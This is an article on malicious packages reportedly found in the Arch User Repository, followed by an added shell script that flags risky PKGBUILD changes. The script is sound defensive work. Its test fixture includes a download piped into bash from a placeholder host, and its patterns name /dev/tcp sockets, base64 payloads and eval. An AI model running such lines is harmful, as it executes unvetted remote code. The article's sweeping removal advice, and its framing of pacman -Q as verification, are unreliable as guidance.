Malicious apps slipped into the Arch User Repository — how to protect yourself
Researchers at Sonatype found about 1,500 malicious packages in the Arch User Repository. The Arch team urged users to review all PKGBUILD and install script changes when updating and to report suspicious commits via the aur-general mailing list. The AUR lets developers make software available before it reaches Arch’s official repositories: package descriptions (PKGBUILDs) make it possible to compile source with makepkg and install with pacman.
Anyone can upload packages and Trusted Users are meant to monitor submissions, but obfuscated malicious code can evade quick reviews and be added to the repository. If you installed anything from the AUR, remove it now: sudo pacman -R PACKAGENAME and then verify installed packages with pacman -Q.
Stop using the AUR until maintainers put stronger protections in place, and scan for suspicious outgoing traffic with a tool like Wireshark; block unknown connections or reinstall the OS if you find signs of compromise.
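The Arch team's advice above is to review every PKGBUILD and install script change when updating. The script below is an added example, not Arch or AUR tooling and not part of the original article. It lists the lines an update adds that deserve a manual read before makepkg runs. The function names, the pattern list, the example-tool package and the example.invalid hosts are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: flag risky lines that an update adds to a PKGBUILD or .install file.
# The pattern list is an illustrative assumption, not a complete rule set.

# flag_pkgbuild_changes OLD NEW
# Prints each flagged added line; returns 1 if anything was flagged, else 0.
flag_pkgbuild_changes() {
    # Normal-format diff marks lines that exist only in NEW with "> ".
    # Patterns, in order: download piped to a shell, decoded payload, eval,
    # bash raw socket, service enabling, new install hook, any added URL.
    diff -- "$1" "$2" | sed -n 's/^> //p' | grep -E \
        -e '(curl|wget)[^|]*[|][[:space:]]*(sudo[[:space:]]+)?(ba|z)?sh' \
        -e 'base64[[:space:]]+(-d|--decode)' \
        -e '(^|[^[:alnum:]_])eval[[:space:]]' \
        -e '/dev/tcp/' \
        -e 'systemctl[[:space:]].*enable' \
        -e '^[[:space:]]*install=' \
        -e 'https?://' \
    && return 1
    return 0
}

# Runs the check on two constructed PKGBUILD versions (hypothetical package).
demo() {
    dir=$(mktemp -d) || return 2
    # Constructed sample: the version that was already reviewed.
    cat > "$dir/PKGBUILD.old" <<'EOF'
pkgname=example-tool
pkgver=1.0
source=("https://example.invalid/example-tool-$pkgver.tar.gz")
package() {
    make DESTDIR="$pkgdir" install
}
EOF
    # Constructed sample: the update adds an install hook and a piped download.
    cat > "$dir/PKGBUILD.new" <<'EOF'
pkgname=example-tool
pkgver=1.1
install=example-tool.install
source=("https://example.invalid/example-tool-$pkgver.tar.gz")
package() {
    curl -s https://cdn.example.invalid/setup.sh | bash
    make DESTDIR="$pkgdir" install
}
EOF
    status=0
    flag_pkgbuild_changes "$dir/PKGBUILD.old" "$dir/PKGBUILD.new" || status=$?
    rm -rf "$dir"
    return "$status"
}

demo || echo "Flagged lines above need a manual read before running makepkg."
```

A clean result only means none of these patterns matched; it does not replace reading the full diff, since obfuscated code can be written to avoid any fixed pattern list.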